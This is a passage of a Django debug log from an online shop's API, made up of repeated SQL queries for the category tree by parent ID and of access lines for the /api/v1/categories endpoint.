= 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-19 13:56:08,209 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-19 13:56:08,211 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-19 13:56:08,214 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-19 13:56:08,217 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-19 13:56:08,222 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-19 13:56:08,224 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-19 13:56:08,227 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-19 13:56:08,230 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-19 13:56:08,232 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-19 13:56:08,234 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-19 13:56:08,238 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-19 13:56:08,242 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-19 13:56:08,246 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-19 13:56:08,251 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-19 13:56:08,255 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [19/Dec/2019 13:56:08] "GET /api/v1/categories/ HTTP/1.0" 200 15396 DEBUG 2019-12-19 13:57:10,718 utils 4252 140031492613888 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."id" = 3; args=(3,) DEBUG 2019-12-19 13:57:10,724 utils 4252 140031503103744 (0.007) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-19 13:57:10,729 utils 4252 140031492613888 (0.006) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-19 13:57:10,743 utils 4252 140031503103744 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) [19/Dec/2019 13:57:10] "GET /api/v1/categories/3 HTTP/1.0" 200 942 DEBUG 2019-12-19 13:57:10,748 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-19 13:57:10,751 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-19 13:57:10,755 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2019-12-19 13:57:10,757 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-19 13:57:10,760 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-19 13:57:10,762 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-19 13:57:10,765 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-19 13:57:10,769 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-19 13:57:10,772 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-19 13:57:10,774 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-19 13:57:10,777 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-19 13:57:10,779 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-19 13:57:10,783 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-19 13:57:10,786 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-19 13:57:10,788 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-19 13:57:10,791 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-19 13:57:10,794 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-19 13:57:10,799 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-19 13:57:10,801 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-19 13:57:10,804 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-19 13:57:10,806 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-19 13:57:10,809 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-19 13:57:10,811 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-19 13:57:10,815 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-19 13:57:10,818 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-19 13:57:10,821 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-19 13:57:10,823 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-19 13:57:10,826 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-19 13:57:10,829 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-19 13:57:10,832 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-19 13:57:10,835 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-19 13:57:10,839 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-19 13:57:10,842 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-19 13:57:10,846 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-19 13:57:10,849 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-19 13:57:10,852 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-19 13:57:10,854 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-19 13:57:10,857 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-19 13:57:10,859 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-19 13:57:10,864 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-19 13:57:10,867 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-19 13:57:10,869 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-19 13:57:10,873 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-19 13:57:10,876 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [19/Dec/2019 13:57:10] "GET /api/v1/categories/ HTTP/1.0" 200 15396 [19/Dec/2019 13:57:15] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-19 13:57:18,260 utils 4252 140031503103744 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."id" = 3; args=(3,) DEBUG 2019-12-19 13:57:18,265 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-19 13:57:18,269 utils 4252 140031492613888 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-19 13:57:18,275 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) [19/Dec/2019 13:57:18] "GET /api/v1/categories/3 